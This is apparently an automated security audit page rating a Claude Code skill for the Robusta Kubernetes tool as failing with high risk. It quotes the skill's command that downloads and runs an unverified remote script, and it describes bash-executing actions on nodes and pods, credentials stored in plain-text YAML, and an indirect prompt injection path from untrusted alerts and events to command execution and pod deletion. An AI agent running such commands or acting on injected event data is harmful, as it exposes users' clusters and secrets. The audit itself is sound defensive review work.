Skills
skills/julianobarbosa/claude-code-skills/RobustaDev/Gen Agent Trust Hub

RobustaDev

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONCREDENTIALS_UNSAFE
Full Analysis
  • EXTERNAL_DOWNLOADS & REMOTE_CODE_EXECUTION (HIGH): The skill instructs the agent to download an executable script from an external domain (https://docs.robusta.dev/master/_static/robusta), grant it execution permissions (chmod +x), and run it. Since this domain is not on the Trusted Sources list, this represents an unverified remote code execution vector.
  • Evidence: SKILL.md, Workflows/Install.md, and references/Installation.md all contain the command: curl -fsSL -o robusta https://docs.robusta.dev/master/_static/robusta && chmod +x robusta && ./robusta gen-config.
  • COMMAND_EXECUTION (HIGH): The skill documents and promotes the use of actions that execute arbitrary bash commands on Kubernetes nodes and within pods.
  • Evidence: references/Actions.md defines node_bash_enricher and pod_bash_enricher which take a bash_command parameter. This capability, when tied to external triggers, creates a direct path for command injection.
  • DATA EXPOSURE & CREDENTIALS (MEDIUM): The workflow requires users to put highly sensitive information (Slack Bot tokens, PagerDuty API keys, Jira tokens, ServiceNow passwords) into a plain-text YAML file (generated_values.yaml). While placeholders are used in the documentation, the skill does not provide security best practices for handling this sensitive file (e.g., K8s Secrets or encryption).
  • Evidence: Workflows/ConfigureSinks.md and references/Sinks.md show multiple examples of hardcoded api_key, webhook_url, and password fields.
  • DYNAMIC EXECUTION (MEDIUM): The skill supports loading custom Python-based actions from remote Git repositories, which are executed at runtime by the Robusta runner.
  • Evidence: references/Actions.md describes the playbookRepos configuration which pulls code from external URLs like https://github.com/my-org/my-playbooks.
  • INDIRECT PROMPT INJECTION (LOW): The skill possesses a significant attack surface for indirect injection as it processes data from untrusted external sources (Prometheus alerts and Kubernetes events) and uses that data to trigger powerful capabilities like bash execution and pod deletion.
  • Ingestion points: Kubernetes Events, Prometheus Alerts (references/Triggers.md).
  • Boundary markers: Absent; data is processed directly as event objects.
  • Capability inventory: node_bash_enricher, pod_bash_enricher, delete_pod (references/Actions.md).
  • Sanitization: Absent for command parameters; regex redaction is only mentioned for logs output.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:03 PM